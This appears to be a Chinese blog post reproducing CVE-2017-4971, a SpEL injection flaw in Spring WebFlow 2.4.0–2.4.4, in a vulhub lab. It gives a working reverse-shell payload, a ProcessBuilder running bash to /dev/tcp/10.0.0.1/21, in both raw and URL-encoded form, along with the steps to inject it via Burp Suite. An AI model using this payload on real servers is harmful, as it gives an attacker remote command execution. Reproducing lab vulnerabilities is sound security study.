贫僧法号云空丶
贫僧法号云空丶

Spring WebFlow-远程代码执行漏洞(CVE-2017-4971)

Spring WebFlow-远程代码执行漏洞(CVE-2017-4971)

0x00 前言

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

影响版本:

Spring WebFlow 2.4.0 - 2.4.4

**利用条件:**知道用户名和密码

0x01 环境搭建

这里使用vulhub漏洞靶场

Spring WebFlow-远程代码执行漏洞(CVE-2017-4971)_第1张图片

账号密码在登录框左侧,可随意使用

0x02 复现步骤

1、访问http://192.168.12.130:8080/hotels/booking?execution=e1s1页面,任意填写数据后Proceed提交

Spring WebFlow-远程代码执行漏洞(CVE-2017-4971)_第2张图片

2、点击Confirm,并使用burpsuite抓包

获取到POST数据包后添加参数(反弹shell的poc)

_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub

将poc进行url编码

_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/10.0.0.1/21+0>%261")).start()=vulhub

Spring WebFlow-远程代码执行漏洞(CVE-2017-4971)_第3张图片

注意:这里直接修改原始数据包就行,重放是无法生效的

Spring WebFlow-远程代码执行漏洞(CVE-2017-4971)_第4张图片

0x03 修复建议

1、及时更新官方最新补丁

你可能感兴趣的:(漏洞复现,spring,web安全)

  • Spring Boot 核心注解,常用注解,注解大全 码上农民 springBootspringbootspringjava
    前言SpringBoot主要优势之一,就是“开箱即用,远离繁琐的配置”。SpringBoot架构没有代码生成,也不需要XML配置,有效避免大量的Maven导入和各种版本冲突,为Spring开发提供一个更快、更广泛的入门体验。不得不说,掌握SpringBoot常用注解,是学习SpringBoot架构的关键。一、核心注解@SpringBootApplication通常用在启动类上,申明让springb
  • 00后会自动化就想拿20K?不,你还差点远呢··· v_648374 自动化运维
    等你搭建好公司的自动化生态,你还是不满足,我为什么不把这些东西可视化管理呢?做个平台?管理用例,管理任务,管理测试报告?我还可以把公司的一些部署任务也集成过来?想法很好!此时的你已经不仅仅是一名优秀的自动化工程师了,已经迈向了测试开发的道路!开始学习,了解了测试框架httprunner,开发框架django/flask/springboot,懂得了接口开发的流程,了解了mybatis,shiro,
  • Spring Boot常用注解及其含义 拾柒mm javaspringboot
    SpringBoot常用注解及其含义注解含义@SpringBootApplication标记主应用程序类,包含@Configuration、@EnableAutoConfiguration和@ComponentScan。@EnableAutoConfiguration启用SpringBoot的自动配置功能,根据类路径中的依赖自动配置应用程序。@Configuration标记一个类为Spring的配
  • linux打jar包xml文件,springboot打jar包部署外置配置文件 胡佳威 linux打jar包xml文件
    一、读取配置文件的优先级默认:Jar包同级目录的config目录Jar包同级目录classPath(即resources目录)的config目录classpath目录最高优先级的方式是项目启动时通过命令的方式指定项目加载核心配置文件,命令如下java–jarxxxx.jar-Dspring.config.location=xxx/xxx/xxxx.properties如果SpringBoot在优先
  • springboot配置文件加载顺序,配置文件优先级 AiJann
    1.若application.yml和bootStrap.yml在同一目录下,则bootStrap.yml的加载顺序要高于application.yml,即bootStrap.yml会优先被加载。原理:bootstrap.yml用于应用程序上下文的引导阶段。bootstrap.yml由父SpringApplicationContext加载。•bootstrap.yml可以理解成系统级别的一些参数配
  • 12306项目学习笔记(框架篇Base) Rainyocode 学习
    首先学习的是基础框架ApplicationContextHolderApplicationContextHolder提供了一种静态方式来访问Spring容器中的Bean,适用于某些特定场景,如工具类和框架集成。在12306项目中由于我们引入了RocketMQ消息队列,这些库的对象通常不是Spring管理的,无法直接使用@Autowired注入,所以需要ApplicationContextHolde
  • Spring Boot 和 React 文件上传与下载教程 DZSpace 软件开发springbootreact.js后端
    在本教程中,你将学习如何使用SpringBoot构建文件上传和下载的后端功能,以及使用React实现前端界面。示例中还包括文件预览的功能。目录设置SpringBoot后端创建React前端整合与测试设置SpringBoot后端我们首先创建一个简单的SpringBoot应用程序来处理文件上传和下载。创建SpringBoot项目使用你喜欢的方法(SpringInitializr、IDE等)创建一个新的
  • Spring Boot简介与体系知识导图 神州永泰 大数据编程语言javaspringboot后端java
    SpringBoot是Spring开源组织下的一个子项目,是一个基于Spring框架的快速开发脚手架,它极大地简化了Spring应用的初始化和搭建过程,为开发者提供了快速、简单的方式来开发、部署和管理Spring应用。以下是关于SpringBoot的详细介绍:一、概述定义:SpringBoot是一个用于简化Spring应用程序开发和部署的框架,它通过自动配置和嵌入式服务器等技术,让开发者能够更加专
  • springboot jar 配置文件同级目录 启动脚本sh 并添加日志文件,日志文件定时分文件 iteye_10392 javaspringbootjar后端
    为了创建一个SpringBoot应用的启动脚本,并且配置日志输出到一个会定期分割的日志文件中,你可以按照以下步骤来进行:创建启动脚本:首先,创建一个shell脚本文件,比如命名为start-your-app.sh。配置日志文件:使用logback.xml或者application.properties来配置日志输出。如果你的应用已经有一个日志配置文件,那么你可能只需要稍微修改一下配置即可。日志文件
  • Spring 源码解读:实现单例与原型的Bean作用域 捕风捉你 spring源码解读springjava后端
    引言在Spring框架中,Bean的作用域(Scope)定义了Bean的生命周期和访问范围。Spring提供了多种作用域,包括常用的单例(Singleton)和原型(Prototype)。了解并正确使用这些作用域对于管理应用的资源和性能至关重要。本篇文章将通过手动实现单例和原型作用域的Bean管理机制,并对比Spring中的@Scope注解,帮助你理解不同Bean作用域的使用场景和实现细节。Bea
  • SpringMVC 的组件与基本使用 康康峰 SpringMVC源码解析springmvcjava后端
    2.4SpringMVC对视图的支持2.4.1视图查找解析SpringMVC提供了ViewResolver接口用以通过视图名查找并解析视图。该接口有resolveViewName方法,返回View视图。接受String类型的视图名,以该视图名进行查找。还有Locale类型的地区参数,用于进行国际化。SpringMVC的控制器中支持多个ViewResolver,查找视图时进行遍历查找,直到找到相应的
  • Spring MVC 的基本组件与使用 康康峰 SpringMVC源码解析springmvcjava
    2.2SpringMVC对控制器的支持2.2.3处理器执行(常见的三种Handler)1.HttpRequestHandler这是一种比较简单的Handler,HttpRequestHandler接口只有一个handleRequest方法,传入HttpServletRequest和HttpServletResponse两个参数,没有返回值。这种Handler只为处理简单的HTTP请求,其中不涉及复
  • SpringBoot+Vue疫苗接种管理系统 预约接种疫苗管理系统 疫苗接种查询系统Java 计算机程序老哥
    作者主页:计算机毕业设计老哥有问题可以主页问我一、开发介绍1.1开发环境开发语言:Java数据库:MySQL系统架构:B/S后端:SpringBoot(Spring+SpringMVC+Mybatis)前端:Vue工具:IDEA或者Eclipse,JDK1.8,Maven二、系统介绍2.1图片展示注册登录页面:登陆.png前端页面功能:首页、疫苗信息、健康科普、疫苗资讯、个人中心、后台管理、咨询服
  • Spring Security与Apache Shiro:Java安全框架的比较 Lill_bin javajavaspringapache分布式安全后端开发语言
    引言在Java企业级应用开发中,安全性是一个不可忽视的重要方面。随着Web应用的复杂性日益增加,选择合适的安全框架对于保护应用免受未授权访问和其他安全威胁至关重要。SpringSecurity和ApacheShiro是两个广泛使用的Java安全框架,它们提供了认证(Authentication)和授权(Authorization)的功能。本文将对这两个框架进行比较,探讨它们的设计理念、核心特性以及
  • springboot 集成 mybatis plus 在controller层实现的增删改查用法,以及spring boot 常用注解 奇纳尼 ideajavaspringbootrest
    注意事项://注意:当使用参数@requestBody的时候,只支持post请求,所以只能用@PostMapping,当@requestBody里面的可以为空时候,设置required=false,//注意:StringUtils用org.springframework.util的可以判断StringUtils.isEmpty(Object),用common下面的只能字符串//注意:当我们在参数传
  • 单元测试框架PowerMock yzh_1346983557 Spring测试单元测试PowerMock
    目录一、为何用?二、powermock的使用1.引入依赖2.单测代码1.普通public方法2.模拟构造器和final方法3.模拟static静态方法4.局部的final、private方法模拟其它Springboot集成测试:一、为何用?Mockito是一个针对Java的单元测试模拟框架,它与EasyMock和jMock很相似,都是为了简化单元测试过程中测试上下文(或者称之为测试驱动函数以及桩函
  • Redis相关操作工具类 左弦月 redisjava前端
    基础版:importjava.util.concurrent.TimeUnit;importorg.springframework.beans.BeansException;importorg.springframework.beans.factory.BeanFactory;importorg.springframework.beans.factory.BeanFactoryAware;impo
  • 用powermock编写单元测试 左弦月 单元测试
    1、pom文件引入jar包org.springframework.bootspring-boot-starter-testtestjunitjunittestorg.powermockpowermock-module-junit42.0.2testorg.powermockpowermock-api-mockito22.0.2testcom.github.jsonzoujmockdata4.1.2
  • K8S磁盘与Sleuth 引发的redis经常丢失链接等怪异问题。 appearappear kubernetes容器云原生
    描述Docker容器挂载磁盘记录Springboot的日志,挂载磁盘性能很低,导致java应用响应缓慢增加SpringCloud的sleuth,标记出某次请求的日志,查看哪里耗时增加。问题1出现了,redis时不时丢失链接,使用redis客户端访问正常问题2看日志看不出明显耗时日志,使用skyWalking查看,日志之间都有规律的耗时相对较长问题原因问题1:sleuth与redis兼容性出现了问题
  • 【VUE+SpringBoot】前端获取到的数据与后台从数据库中获取到的数据不一致 你不懂的阳
    问题后台从数据库中查询到的数据,转换成JSON字符串传到前端后,缺少部分字段。@RequestMapping("/getUpdateUser")publicStringgetUpdateUser(intid){Useruser=userDao.getUpdateUser(id);Stringstring=JSON.toJSONString(user);returnstring;}asyncshow
  • 基于SpringBoot+Vue+MySQL的图书管理系统 程序员大金 Java项目springbootvue.jsmysqljava后端tomcatspring
    系统背景  在探讨基于SpringBoot+Vue+MySQL的图书管理系统的研究背景时,我们可以从以下几个方面进行深入分析:一、数字化时代的图书管理需求  随着信息技术的飞速发展和互联网的普及,数字化已成为现代社会不可逆转的趋势。在图书管理领域,传统的纸质图书管理方式已逐渐显露出其局限性,如管理效率低下、信息更新缓慢、读者服务体验不佳等。因此,开发一套高效、便捷、智能化的图书管理系统成为图书馆和
  • spring boot引入其他模块,没有注册引入模块的配置类 Java小弟xu springbootjava后端
    在springboot的多模块(或微服务)项目中,需要引入其他模块。如果被引入模块里面有配置类,也需要注册,这时就需要在引入模块的启动类上的@SpringBootApplication注解后面,加上扫描的包路径(多个模块则配置多个路径)//声明配置类扫描路径@SpringBootApplication(scanBasePackages={"com.xge.security","com.xge.us
  • 上传文件太大 net::ERR_CONNECTION_ABORTED 500 (Internal Server Error) 连接失败错误 我的风格0.0 spring前端springjava前端
    前端技术:VUE,elementUI后端技术:springCloudspringBoot前台上传文件时一直报错:net::ERR_CONNECTION_ABORTED问题根因:上传文件太大,超过后台配置解决办法:后台application.yml中添加配置:spring:servlet:multipart:enabled:truemax-file-size:100MBmax-request-siz
  • 构建Spring Boot应用的多环境配置策略 微赚淘客机器人开发者联盟@聚娃科技 springboot后端java
    构建SpringBoot应用的多环境配置策略大家好,我是微赚淘客返利系统3.0的小编,是个冬天不穿秋裤,天冷也要风度的程序猿!在开发SpringBoot应用时,经常需要针对不同的环境(如开发环境、测试环境和生产环境)使用不同的配置。SpringBoot提供了多种机制来实现多环境配置,本文将介绍如何构建SpringBoot应用的多环境配置策略。多环境配置的重要性多环境配置允许开发者为不同环境定义特定
  • SpringBoot:文件的上传与下载(Header弹窗下载形式) Peacock Ming King SpringbootJAVA
    不废话了,直接放Controller的代码吧importcom.sun.xml.internal.ws.api.ResourceLoader;importjava.io.File;importjava.io.FileOutputStream;importjava.io.IOException;importjava.io.UnsupportedEncodingException;importjava
  • MyBatis 环境搭建 2019-03-25 琴匣自鸣
    MyBatis各版本下载地址点击Spring各版本下载地址点击Mybatis详解http://www.mybatis.org/mybatis-3/zh/configuration.html记录下犯过的错误1.驱动driver单词写错2.数据库驱动大小写不对3.url地址写错4.log4j需要配置文件没加初步搭建环境,准备工作:Mybatis.jarLog4j.jar数据库驱动jar注意Mybati
  • 如何使用Spring IOC的注解进行开发 李李世界爱学Java springjava后端
    目录1、如何使用注解标记和扫描2、如何使用注解配置作用域和周期方法3、如何使用注解进行引用类型自动装配4、如何使用注解对基本类型属性赋值SpringIoC(InversionofControl,控制反转)容器通过注解提供了一种简洁且强大的方式来进行依赖注入和配置管理。注解开发使得Spring应用程序的配置更为简洁和直观,减少了XML配置的冗余和复杂性。注解本身并不能执行,注解本身仅仅只是做一个标记
  • springboot使用logback 大海星辰798 springbootlogback后端
    1、在src/main/resources下添加logback-spring.xml(springboot会自动识别改配置文件),配置如下:${LOG_DIR}/logs/%d{yyyy-MM,aux}/current-%d{yyyy-MM-dd}.log30%d{yyyy-MM-ddHH:mm:ss.SSS}[%thread]%-5level%logger{36}-%msg%n%d{yyyy-M
  • springboot集成kafka、消息发送、消费使用 ‘’小磊 JAVA工具包javakafka中间件springboot
    文章目录简介jar引入配置文件KafkaConfiguration消费工程配置kafka消息发送、消费示例简介本示例用于kafka在springboot中的配置、消息发送及消息消费使用代码示例。jar引入代码示例:org.springframework.kafkaspring-kafka配置文件#kafka配置#指定kafka代理地址(集群配多个、中间、逗号隔开)spring.kafka.boot
  • SpringBoot集成Kafka并发送消息 莫笔q springbootkafkajava
    SpringBoot集成kafka一、下载依赖maven仓库官方地址:https://mvnrepository.com/找到和自己项目SpringBoot相匹配版本的kafka版本(此处为1.3.9.RELEASE)org.springframework.kafkaspring-kafka1.3.9.RELEASE在项目配置文件中添加以下配置:spring:kafka:topic:app_eve
  • 设计模式介绍 tntxia 设计模式
    设计模式来源于土木工程师 克里斯托弗 亚历山大(http://en.wikipedia.org/wiki/Christopher_Alexander)的早期作品。他经常发表一些作品,内容是总结他在解决设计问题方面的经验,以及这些知识与城市和建筑模式之间有何关联。有一天,亚历山大突然发现,重复使用这些模式可以让某些设计构造取得我们期望的最佳效果。 亚历山大与萨拉-石川佳纯和穆雷 西乐弗斯坦合作
  • android高级组件使用(一) 百合不是茶 androidRatingBarSpinner
    1、自动完成文本框(AutoCompleteTextView) AutoCompleteTextView从EditText派生出来,实际上也是一个文本编辑框,但它比普通编辑框多一个功能:当用户输入一个字符后,自动完成文本框会显示一个下拉菜单,供用户从中选择,当用户选择某个菜单项之后,AutoCompleteTextView按用户选择自动填写该文本框。 使用AutoCompleteTex
  • [网络与通讯]路由器市场大有潜力可挖掘 comsci 网络
              如果国内的电子厂商和计算机设备厂商觉得手机市场已经有点饱和了,那么可以考虑一下交换机和路由器市场的进入问题.....        这方面的技术和知识,目前处在一个开放型的状态,有利于各类小型电子企业进入  &nbs
  • 自写简单Redis内存统计shell 商人shang Linux shell统计Redis内存
    #!/bin/bash address="192.168.150.128:6666,192.168.150.128:6666" hosts=(${address//,/ }) sfile="staticts.log" for hostitem in ${hosts[@]} do ipport=(${hostitem
  • 单例模式(饿汉 vs懒汉) oloz 单例模式
    package 单例模式; /* * 应用场景:保证在整个应用之中某个对象的实例只有一个 * 单例模式种的《 懒汉模式》 * */ public class Singleton { //01 将构造方法私有化,外界就无法用new Singleton()的方式获得实例 private Singleton(){}; //02 申明类得唯一实例 priva
  • springMvc json支持 杨白白 json springmvc
    1.Spring mvc处理json需要使用jackson的类库,因此需要先引入jackson包 2在spring mvc中解析输入为json格式的数据:使用@RequestBody来设置输入 @RequestMapping("helloJson") public @ResponseBody JsonTest helloJson() {
  • android播放,掃描添加本地音頻文件 小桔子
            最近幾乎沒有什麽事情,繼續鼓搗我的小東西。想在項目中加入一個簡易的音樂播放器功能,就像華為p6桌面上那麼大小的音樂播放器。用過天天動聽或者QQ音樂播放器的人都知道,可已通過本地掃描添加歌曲。不知道他們是怎麼實現的,我覺得應該掃描設備上的所有文件,過濾出音頻文件,每個文件實例化為一個實體,記錄文件名、路徑、歌手、類型、大小等信息。具體算法思想,
  • oracle常用命令 aichenglong oracledba常用命令
    1 创建临时表空间 create temporary tablespace user_temp  tempfile 'D:\oracle\oradata\Oracle9i\user_temp.dbf' size 50m  autoextend on  next 50m maxsize 20480m  extent management local
  • 25个Eclipse插件 AILIKES eclipse插件
    提高代码质量的插件1. FindBugsFindBugs可以帮你找到Java代码中的bug,它使用Lesser GNU Public License的自由软件许可。2. CheckstyleCheckstyle插件可以集成到Eclipse IDE中去,能确保Java代码遵循标准代码样式。3. ECLemmaECLemma是一款拥有Eclipse Public License许可的免费工具,它提供了
  • Spring MVC拦截器+注解方式实现防止表单重复提交 baalwolf spring mvc
    原理:在新建页面中Session保存token随机码,当保存时验证,通过后删除,当再次点击保存时由于服务器端的Session中已经不存在了,所有无法验证通过。   1.新建注解:   ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
  • 《Javascript高级程序设计(第3版)》闭包理解 bijian1013 JavaScript
    “闭包是指有权访问另一个函数作用域中的变量的函数。”--《Javascript高级程序设计(第3版)》         看以下代码: <script type="text/javascript"> function outer() { var i = 10; return f
  • AngularJS Module类的方法 bijian1013 JavaScriptAngularJSModule
            AngularJS中的Module类负责定义应用如何启动,它还可以通过声明的方式定义应用中的各个片段。我们来看看它是如何实现这些功能的。 一.Main方法在哪里         如果你是从Java或者Python编程语言转过来的,那么你可能很想知道AngularJS里面的main方法在哪里?这个把所
  • [Maven学习笔记七]Maven插件和目标 bit1129 maven插件
    插件(plugin)和目标(goal) Maven,就其本质而言,是一个插件执行框架,Maven的每个目标的执行逻辑都是由插件来完成的,一个插件可以有1个或者几个目标,比如maven-compiler-plugin插件包含compile和testCompile,即maven-compiler-plugin提供了源代码编译和测试源代码编译的两个目标   使用插件和目标使得我们可以干预
  • 【Hadoop八】Yarn的资源调度策略 bit1129 hadoop
    1. Hadoop的三种调度策略 Hadoop提供了3中作业调用的策略, FIFO Scheduler Fair Scheduler Capacity Scheduler 以上三种调度算法,在Hadoop MR1中就引入了,在Yarn中对它们进行了改进和完善.Fair和Capacity Scheduler用于多用户共享的资源调度   2. 多用户资源共享的调度
  • Nginx使用Linux内存加速静态文件访问 ronin47
    Nginx是一个非常出色的静态资源web服务器。如果你嫌它还不够快,可以把放在磁盘中的文件,映射到内存中,减少高并发下的磁盘IO。 先做几个假设。nginx.conf中所配置站点的路径是/home/wwwroot/res,站点所对应文件原始存储路径:/opt/web/res shell脚本非常简单,思路就是拷贝资源文件到内存中,然后在把网站的静态文件链接指向到内存中即可。具体如下:
  • 关于Unity3D中的Shader的知识 brotherlamp unityunity资料unity教程unity视频unity自学
    首先先解释下Unity3D的Shader,Unity里面的Shaders是使用一种叫ShaderLab的语言编写的,它同微软的FX文件或者NVIDIA的CgFX有些类似。传统意义上的vertex shader和pixel shader还是使用标准的Cg/HLSL 编程语言编写的。因此Unity文档里面的Shader,都是指用ShaderLab编写的代码,然后我们来看下Unity3D自带的60多个S
  • CopyOnWriteArrayList vs ArrayList bylijinnan java
    package com.ljn.base; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.concurrent.CopyOnWriteArrayList; /** * 总述: * 1.ArrayListi不是线程安全的,CopyO
  • 内存中栈和堆的区别 chicony 内存
    1、内存分配方面:     堆:一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 。注意它与数据结构中的堆是两回事,分配方式是类似于链表。可能用到的关键字如下:new、malloc、delete、free等等。     栈:由编译器(Compiler)自动分配释放,存放函数的参数值,局部变量的值等。其操作方式类似于数据结构中
  • 回答一位网友对Scala的提问 chenchao051 scalamap
    本来准备在私信里直接回复了,但是发现不太方便,就简要回答在这里。 问题 写道 对于scala的简洁十分佩服,但又觉得比较晦涩,例如一例,Map("a" -> List(11,111)).flatMap(_._2),可否说下最后那个函数做了什么,真正在开发的时候也会如此简洁?谢谢    先回答一点,在实际使用中,Scala毫无疑问就是这么简单。
  • mysql 取每组前几条记录 daizj mysql分组最大值最小值每组三条记录
    一、对分组的记录取前N条记录:例如:取每组的前3条最大的记录 1.用子查询: SELECT * FROM tableName a  WHERE 3> (SELECT COUNT(*) FROM  tableName b WHERE b.id=a.id AND b.cnt>a. cnt) ORDER BY a.id,a.account DE
  • HTTP深入浅出 http请求 dcj3sjt126com http
      HTTP(HyperText Transfer Protocol)是一套计算机通过网络进行通信的规则。计算机专家设计出HTTP,使HTTP客户(如Web浏览器)能够从HTTP服务器(Web服务器)请求信息和服务,HTTP目前协议的版本是1.1.HTTP是一种无状态的协议,无状态是指Web浏览器和Web服务器之间不需要建立持久的连接,这意味着当一个客户端向服务器端发出请求,然后We
  • 判断MySQL记录是否存在方法比较 dcj3sjt126com mysql
    把数据写入到数据库的时,常常会碰到先要检测要插入的记录是否存在,然后决定是否要写入。   我这里总结了判断记录是否存在的常用方法:   sql语句: select   count ( * )  from  tablename;   然后读取count(*)的值判断记录是否存在。对于这种方法性能上有些浪费,我们只是想判断记录记录是否存在,没有必要全部都查出来。
  • 对HTML XML的一点认识 e200702084 htmlxml
    感谢http://www.w3school.com.cn提供的资料 HTML 文档中的每个成分都是一个节点。 节点 根据 DOM,HTML 文档中的每个成分都是一个节点。 DOM 是这样规定的: 整个文档是一个文档节点 每个 HTML 标签是一个元素节点 包含在 HTML 元素中的文本是文本节点 每一个 HTML 属性是一个属性节点 注释属于注释节点 Node 层次
  • jquery分页插件 genaiwei jqueryWeb前端分页插件
    //jquery页码控件// 创建一个闭包    (function($) {      // 插件的定义      $.fn.pageTool = function(options) {        var totalPa
  • Mybatis与Ibatis对照入门于学习 Josh_Persistence mybatisibatis区别联系
    一、为什么使用IBatis/Mybatis         对于从事 Java EE 的开发人员来说,iBatis 是一个再熟悉不过的持久层框架了,在 Hibernate、JPA 这样的一站式对象 / 关系映射(O/R Mapping)解决方案盛行之前,iBaits 基本是持久层框架的不二选择。即使在持久层框架层出不穷的今天,iBatis 凭借着易学易用、
  • C中怎样合理决定使用那种整数类型? 秋风扫落叶 c数据类型
    如果需要大数值(大于32767或小于32767), 使用long 型。 否则, 如果空间很重要 (如有大数组或很多结构), 使用 short 型。 除此之外, 就使用 int 型。 如果严格定义的溢出特征很重要而负值无关紧要, 或者你希望在操作二进制位和字节时避免符号扩展的问题, 请使用对应的无符号类型。 但是, 要注意在表达式中混用有符号和无符号值的情况。    &nbs
  • maven问题 zhb8015 maven问题
      问题1: Eclipse 中 新建maven项目 无法添加src/main/java 问题    eclipse创建maevn web项目,在选择maven_archetype_web原型后,默认只有src/main/resources这个Source Floder。     按照maven目录结构,添加src/main/ja
  • (二)androidpn-server tomcat版源码解析之--push消息处理 spjich javaandrodipn推送
    在 (一)androidpn-server tomcat版源码解析之--项目启动这篇中,已经描述了整个推送服务器的启动过程,并且把握到了消息的入口即XmppIoHandler这个类,今天我将继续往下分析下面的核心代码,主要分为3大块,链接创建,消息的发送,链接关闭。 先贴一段XmppIoHandler的部分代码 /** * Invoked from an I/O proc
  • 用js中的formData类型解决ajax提交表单时文件不能被serialize方法序列化的问题 中华好儿孙 JavaScriptAjaxWeb上传文件FormData
    var formData = new FormData($("#inputFileForm")[0]); $.ajax({ type:'post', url:webRoot+"/electronicContractUrl/webapp/uploadfile", data:formData, async: false, ca
  • mybatis常用jdbcType数据类型 ysj5125094 mybatismapperjdbcType
      MyBatis 通过包含的jdbcType 类型 BIT         FLOAT      CHAR          
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他